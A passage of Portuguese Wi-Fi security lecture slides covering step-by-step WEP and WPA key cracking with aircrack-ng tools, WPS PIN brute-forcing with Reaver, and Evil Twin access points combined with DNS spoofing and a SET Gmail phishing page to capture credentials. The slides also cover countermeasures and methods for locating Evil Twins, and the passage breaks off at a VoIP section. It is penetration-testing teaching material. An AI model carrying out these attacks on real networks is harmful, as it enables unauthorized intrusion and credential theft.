estações Wi-Fi associadas ou tentando seassociar. Ou seja, as 
máquinas dos usuários serão detectadas. 
 
 
 
Marcos Flávio Araújo Assunção 
Fundamentos e ataques a WEP 
Marcos Flávio Araújo Assunção 
Ataques à criptografia: WEP 
 As vulnerabilidades são baseadas em como o 
WEP e a cifra RC4 são implementados 
 WEP só pode utilizar uma chave de 64 ou 128 
bits 
 Vetor de inicialização(IV) de 24 bits e uma chave 
padrão de 40 ou 104 bits 
 Tamanho relativamente pequeno da chave limita a 
sua força 
 
 Implementação do WEP cria um padrão que 
pode ser detectado por atacantes 
 IVs são números de 24 bits 
 IVs começam a se repetir em menos de sete horas 
Marcos Flávio Araújo Assunção 
Vulnerabilidades do WEP 
 Implementação do WEP cria um padrão 
que pode ser detectado por atacantes 
(continuação) 
 Alguns sistemas wireless sempre começam 
com o mesmo IV 
 Colisão 
 Dois pacotes criptografados com o mesmo IV 
 Ataque de dedução de chave 
 Determina a chave através da análise de dois 
pacotes que se colidiram (mesmo IV) 
 
Marcos Flávio Araújo Assunção 
WEP Hacking –Airodump 
Primeiramente, usamos o airodump-ng para filtrar 
todas as redes com criptografia WEP disponíveis. No 
examplo acima selecionaremos a rede com o ESSID 
carol para realizar o ataque. 
 
airodump-ng --encrypt wep mon0 
Marcos Flávio Araújo Assunção 
WEP Hacking - Airodump 
Na primeira imagem, rodamos o airodump-ng na interface 
mon0 filtrando: canal 11, bssid do AP da rede carol e salvando 
o resultado para o arquivo chaveWEP. Veja o resultado na 
segunda imagem. 
 
Agora, teremos que esperar. O campo “Data” deve capturar 
milhares de pacotes IVS para que seja possível realizar a 
decoficação. Tem como acelerar o processo? 
Marcos Flávio Araújo Assunção 
WEP Hacking - Aireplay 
 Utilizando o aireplay-ng nós realizamos o ataque caffe-
latte que pede aos dispositivos conectados à rede carol 
que nos enviem mais pacotes IVS. Com isso veja que 
temos mais de 40000 pacotes no campo #Data. É mais 
que suficiente para quebrar uma chave de 64 bits WEP. 
Marcos Flávio Araújo Assunção 
WEP Hacking - Aircrack 
 Executamos o aircrack-ng com o nome do arquivo que foi 
capturado pelo airodump-ng. Veja que o número de IVS já 
chegava a 71406. Com isso a chave foi rapidamente 
quebrada. A chave utilizada é porco. 
Marcos Flávio Araújo Assunção 
Descriptografando os pacotes capturados 
 O airdecap-ng é um utilitário que consegue 
descriptografar todo o tráfego armazenado em um arquivo 
PCAP, bastando fornecer a chave WEP ou WPA 
descoberta previamente. Assim, o atacante poderá utilizar 
o Wireshark para visualizar os dados que já foram 
capturados. 
Marcos Flávio Araújo Assunção 
 Fundamentos e ataques a WPA 
Marcos Flávio Araújo Assunção 
Acesso Protegido Wi-Fi (WPA) 
 Padrão do 802.11i que cuida tanto da 
criptografia quanto da autenticação 
 
 Temporal Key Integrity Protocol (TKIP) 
 Chaves TKIP são conhecidas como “chave por 
pacote” 
 TKIP dinâmicamente gera uma nova chave para 
cada pacote criado 
 Previne colisões 
 Que era justamente uma das fraquezas principais do 
WEP 
 
Marcos Flávio Araújo Assunção 
Acesso Protegido Wi-Fi (WPA) 
 Autenticação WPA 
 Cumprida por usar tanto o padrão IEEE 802.1x ou 
tecnologia de chave previamente compartilhada (PSK) 
 
 A autenticação PSK usa uma frase para gerar a 
chave de criptografia. Funciona como uma senha. 
 A frase deve ser previamente inserida em cada Access 
Point e dispositivo Wireless. 
 Serve como seed para gerar matematicamente as 
chaves de criptografia 
 
 WPA foi elaborado para resolver as 
vulnerabilidades do WEP com um mínimo de 
inconveniência 
Marcos Flávio Araújo Assunção 
Acesso Protegido Wi-Fi 2 (WPA2) 
 Segunda geração da segurança WPA 
 Usa o Advanced Encryption Standard 
(AES) para criptografia dos dados 
 Suporta autenticação IEEE 802.1x ou 
tecnologia PSK 
 WPA2 permite que ambas as tecnologias 
AES e TKIP operem na mesma rede 
WLAN 
Marcos Flávio Araújo Assunção 
Configurando WPA no Roteador 
Marcos Flávio Araújo Assunção 
WPA Hacking – Airodump 
 Assim como fizemos com o WEP, vamos filtrar no airodump-ng 
todas as redes que utilizem criptografia WPA e WPA2 com o 
comando: airodump-ng –encrypt wpa mon0 
 
Vamos escolher a rede com o ESSID EmpresaX para realizar o 
ataque. 
Marcos Flávio Araújo Assunção 
WPA Hacking – Airodump 
 Também da mesma forma filtraremos no airodump-ng: canal 6, o bssid 
da rede EmpresaX e salvaremos o resultado no arquivo chaveWPA. 
Tudo isso deve ser feito na interface mon0. Comando: 
 
airodump-ng –c 6 –bssid 50:CC:F8:85:ED:B2 –w chaveWPA mon0 
 
O próximo passo é capturar o handshake do WPA. Isso só é possível 
quando algum cliente se conectar na rede. Podemos acelerar esse 
processo deautenticando os usuários com o aireplay 
 
Marcos Flávio Araújo Assunção 
WPA Hacking – Aireplay 
Utilizamos no aireplay o MAC do AP (-a) e o MAC do cliente (-c) que 
foi detectado no airodump. Enviamos 5 pacotes de desassociação . 
 
Verifique no airodump que o WPA Handshake foi capturado. 
Marcos Flávio Araújo Assunção 
Handshake WPA 
Verifique no airodump que o WPA Handshake foi 
capturado. O que fazer com isto? Entra agora o 
processo de força-bruta. 
 
 
Marcos Flávio Araújo Assunção 
WPA Hacking – Aircrack-ng 
 
Primeiramente, ao contrário do WEP, precisamos ter uma wordlist 
(lista de palavras) para tentar realizar a força-bruta no handshake 
WPA que foi capturado. Uma rainbow table pode ser usada para 
acelerar o processo. 
 
O BackTrack Linux já possui uma lista gigantesca no arquivo 
/pentest/passwords/wordlists/rockyou.txt (mais de 100 MB) 
 
Marcos Flávio Araújo Assunção 
Aircrack – Força-Bruta na chave 
A chave foi descoberta. É nossoprecioso 
 
Marcos Flávio Araújo Assunção 
WPS – Wireless Protected Setup 
Marcos Flávio Araújo Assunção 
WPA Hacking – WPS PIN Hacking 
 
O PIN foi configurado para o Wi-Fi Protected 
Setup. Ele é 94154016. 
 Marcos Flávio Araújo Assunção 
WPA Hacking – WPS PIN Hacking 
No exemplo da imagem anterior eu pedi o wash 
para usar a interface mon0 e ignorar erros de 
frame check sequence (fcs). Ele encontrou a 
minha rede defhack e outra que também usa 
WPS. 
Marcos Flávio Araújo Assunção 
WPA Hacking – WPS PIN Hacking 
Vamos executar como exemplo o Reaver "travando" em 
um determinado canal (opções -f e -c 6), modo verbose (-
vv) e usando o bssid do meu Access Point (-b): 
Marcos Flávio Araújo Assunção 
WPA Hacking – WPS PIN Hacking 
A partir deste momento o reaver irá tentar centenas de 
combinações até descobrir o pin. 
Marcos Flávio Araújo Assunção 
Rogue AP e Evil Twin – As piores 
ameaças contra redes sem fio Wi-
Fi 
Marcos Flávio Araújo Assunção 
Ataques diretos através de Rogue APs e 
Evil Twin 
 Access Point ilegítimo (Rogue AP) 
 AP instalado por um funcionário 
 Sem a aprovação ou supervisão da equipe de TI 
 Está dentro da companhia e possui um ESSID 
diferente 
 Evil Twin (fake AP) 
 É um AP que imita o ESSID de uma rede wi-fi 
real. Visa enganar e confundir os clientes para 
que se conectem ao mesmo. Normalmente está 
fora do ambiente físico da empresa. 
Marcos Flávio Araújo Assunção 
Rogue APs e Evil Twin 
Marcos Flávio Araújo Assunção 
Rogue AP – Airbase-ng 
O utilitário Airbase-ng permite “iniciar” um Access Point 
via software (softAP). Isso pode facilmente ser usado 
em conjunto com uma rede cabeada para criar um 
Rogue AP. 
 
(Lembre: Rogue AP não é um Evil Twin, ESSIDs 
diferentes)Perceba que o airbase-ng cria uma interface at0 . 
 
Marcos Flávio Araújo Assunção 
Rogue AP – Visão do cliente 
O cliente enxerga a rede Faculdade e tenta se 
conectar à ela. Vamos ver se a conexão foi 
efetuada com sucesso. 
 
Marcos Flávio Araújo Assunção 
Evil Twin – Servidor DHCP 
Um Evil Twin pode ser configurado para fornecer 
endereço IP aos clientes que se conectarem ao 
nosso access point. 
 
Marcos Flávio Araújo Assunção 
Evil Twin – Desautenticando clientes originais 
Vamos desconectar os clientes da rede original. 
Iremos executar o aireplay-ng com --deauth em 
broadcast para toda a rede 
Marcos Flávio Araújo Assunção 
Evil Twin – Cliente recebendo IP do DHCP 
Perceba que o cliente pegou um endereço IP do 
nosso servidor DHCP. Isso significa que ele se 
conectou com sucesso à interface at0 criada pelo 
airbase-ng 
 
Marcos Flávio Araújo Assunção 
Evil Twin – Capturar o handshake 
WPA utilizando apenas a estação 
cliente 
Marcos Flávio Araújo Assunção 
Evil Twin – WPA Hacking 
Perceba no exemplo da imagem anterior que o airbase-ng 
levantou o Access Point utilizando o ESSID da rede defhack, o 
BSSID do AP real, a criptografia WPA TKIP (-z 2) e verbose (-v) 
para gerar mais informações úteis para debug. 
Marcos Flávio Araújo Assunção 
Evil Twin – WPA Handshake 
Capturamos o Handshake utilizando apenas o 
cliente, sem necessidade nem de ter o Access 
Point real por perto. Agora basta quebrar com o 
Aircrack-NG. 
Marcos Flávio Araújo Assunção 
Eficiência dos ataques de “força-bruta” da chave 
Na maioria dos casos, uma chave com uma 
complexidade muito alta pode levar meses. 
 
 
 
Mas e se houver outra forma? 
E se eu puder simplesmente... “pedir a 
chave”? 
 
Marcos Flávio Araújo Assunção 
Evil Twin – Criar um Honeypot 
utilizando o airbase-ng, DNS 
Spoofing e Apache ou SET 
Marcos Flávio Araújo Assunção 
Evil Twin – DNSSPOOF e Apache 
Usando os comandos mostrados realizamos: 
- Iniciamos o dns spoof na interface at0 (dnsspoof –i 
at0) 
- Iniciamos o Apache (apache2ctl start) 
Marcos Flávio Araújo Assunção 
 Evil Twin - Apache 
Veja que qualquer site que o cliente abrir será 
direcionando para o nosso servidor Apache. Como 
poderíamos substituir essa página? 
Marcos Flávio Araújo Assunção 
Evil Twin – Apache com MySQL 
Marcos Flávio Araújo Assunção 
Evil Twin – Apache com MySQL 
Marcos Flávio Araújo Assunção 
Evil Twin – Social Engineering Toolkit 
Selecionamos o ataque no SET e escolhemos o 
Gmail como template. Importante: o airbase-ng e o 
dnsspoof devem continuar rodando em janelas 
separadas. 
Marcos Flávio Araújo Assunção 
Evil Twin – Página falsa do SET 
Marcos Flávio Araújo Assunção 
Evil Twin – Capturando credenciais 
no SET 
Marcos Flávio Araújo Assunção 
Evil Twin – Criando uma ponte 
Podemos criar uma bridge entre a interface at0 do AP falso e 
uma interface de rede ethernet (ou outra interface Wireless). 
Assim o cliente poderá usar a Internet. 
Marcos Flávio Araújo Assunção 
Evil Twin - Wireshark 
Com o Wireshark, capturamos o tráfego de Internet do 
usuário 
Marcos Flávio Araújo Assunção 
Evil Twin com FreeRadius – WPA Enterprise 
Marcos Flávio Araújo Assunção 
Evil Twin com FreeRadius 
Marcos Flávio Araújo Assunção 
Usando asleap para força-bruta no hash 
Marcos Flávio Araújo Assunção 
Uso de um WIDS/WIPS contra Evil Twins 
• Wireless Intrusion 
Detection/Prevention System 
(WIDS/WIPS) 
- Realiza proteção ativa/passiva de 
uma rede wi-fi. 
 
- Atua contra injeção de pacotes 
ARP, captura de handshakes 
WEP/WPA e auxilia na detecção 
de Rogue APs 
 
- Protege contra Evil Twins 
desassociando as estações 
desses APs malignos. 
 
Marcos Flávio Araújo Assunção 
Multipot 
• São vários Evil Twins 
criados com o airbase-
ng, cada um com um 
MAC (BSSID) diferente. 
 
• Isso permite aumentar a 
concorrência entre o AP 
real e os falsos. 
 
• Inutiliza a “proteção” do 
WIPS contra Evil Twins. 
Marcos Flávio Araújo Assunção 
Multipot (Múltiplos Evil Twins) 
Uma antena com maior ganho (maior dBi) será decisiva na escolha do 
Sistema Operacional do cliente pelo AP correto. 
Marcos Flávio Araújo Assunção 
Indo além – Ataques ainda mais avançados 
• FakeAuth = Autenticação WEP sem precisar 
descobrir a chave 
 
• DNS Tunneling = Permite navegar em APs 
“abertos” (OSA) burlando totalmente a 
autenticação via browser. 
 
• Evil Twin + Metasploit = Permite explorar 
falhas no computador alheio, 
comprometendo totalmente o sistema. 
 
• Multipot + Deauth + DNS Spoofing + 
Bridge + Ettercap/SSL Strip= Apocalypse! 
 
 
 
Marcos Flávio Araújo Assunção 
Contra-medidas para os problemas e 
ataques apresentados em Wi-Fi 
Marcos Flávio Araújo Assunção 
Como se proteger então? 
• Utilizar WPA2-Enterprise com client-side certificates e 
múltiplas camadas de autenticação. 
• Implementar um WIPS com diversos sensores espalhados 
pelo ambiente 
• Implementar um HIDS (Host-based IDS) para que os 
ataques de desautenticação sejam impedidos a nível de 
host. 
• Definir VLANs, filtros de acesso MAC e ocultar a rede 
• Usar criptografia nos protocolos e serviços de camadas 
superiores. Ex: IPSEC, SSL, etc. 
• Realizar Penetration Tests 
• Localizar e remover o Rogue AP e o Evil Twin 
 
 
 
 
“É impossível estar totalmente seguro. O segredo é: dificultar tanto a vida 
de um possível atacante de modo que o investimento para invadir a rede 
seja maior que a motivação para fazê-lo” 
Marcos Flávio Araújo Assunção 
Localizar Rogue AP - Trilateração 
Marcos Flávio Araújo Assunção 
Localizar Rogue AP - Trilateração 
Ekahau HeatMapper 
Não serve para localizar um Evil Twin 
Marcos Flávio Araújo Assunção 
Localizar Evil Twin - GPSD 
Usando o gpsd (gps daemon) para 
inicializar o GPS USB. É necessário 
fazê-lo antes de abrir o Kismet 
Marcos Flávio Araújo Assunção 
Localizar Evil Twin – Kismet + GPS 
Acima, os dados de localização 
capturados pelo GPS. 
Marcos Flávio Araújo Assunção 
Localizar Evil Twin - Giskismet 
O Giskismet está exportando os dados 
gerados para o Kismet para um 
formato que pode ser aberto no Google 
Maps/Earth. 
Marcos Flávio Araújo Assunção 
Localizar Evil Twin – Google Maps 
Dados de localização dos Access 
Points 
Marcos Flávio Araújo Assunção 
Localizou Evil Twin? Pega rex! 
Marcos Flávio Araújo Assunção 
Vulnerabilidades de Voz 
sobre IP (VoIP) 
Marcos Flávio Araújo Assunção 
- VoIP é um conjunto de 
tecnologias que permite que 
chamadas de voz sejam feitas 
através da internet 
 
- Possibilita realização de 
chamadas de baixo custo, ou 
até mesmo gratuitas. 
 
- Redução de custos com 
infra-estrutura. 
 
- Acrescenta novas 
funcionalidades ao serviço 
telefônico 
VOIP 
Marcos Flávio Araújo Assunção 
Vulnerabilidades do VOIP 
Marcos Flávio Araújo Assunção 
Protocolos 
Protocolos de Sinalização 
 
Responsáveis por iniciar, monitorar, modificar e terminar 
chamadas VoIP. 
 
- SIP (Session Intitation Protocol ) - RFC 3261 
- SDP (Session Description Protocol) – RFC 4566 
- MGCP (Media Gateway Control Protocol) – RFC 3435 
- Megaco / H.248 – RFC 3525 
Marcos Flávio Araújo Assunção 
Protocolos 
Protocolos de Mídia 
 
Responsáveis por transportar o fluxo de mídia (Voz ou 
imagens) 
 
- RTP (Real Time Protocol ) - RFC 3261 
- RTCP (Real Time Control Protocol) – RFC 3605 
- SRTP / ZRTP 
Marcos Flávio Araújo Assunção 
Protocolos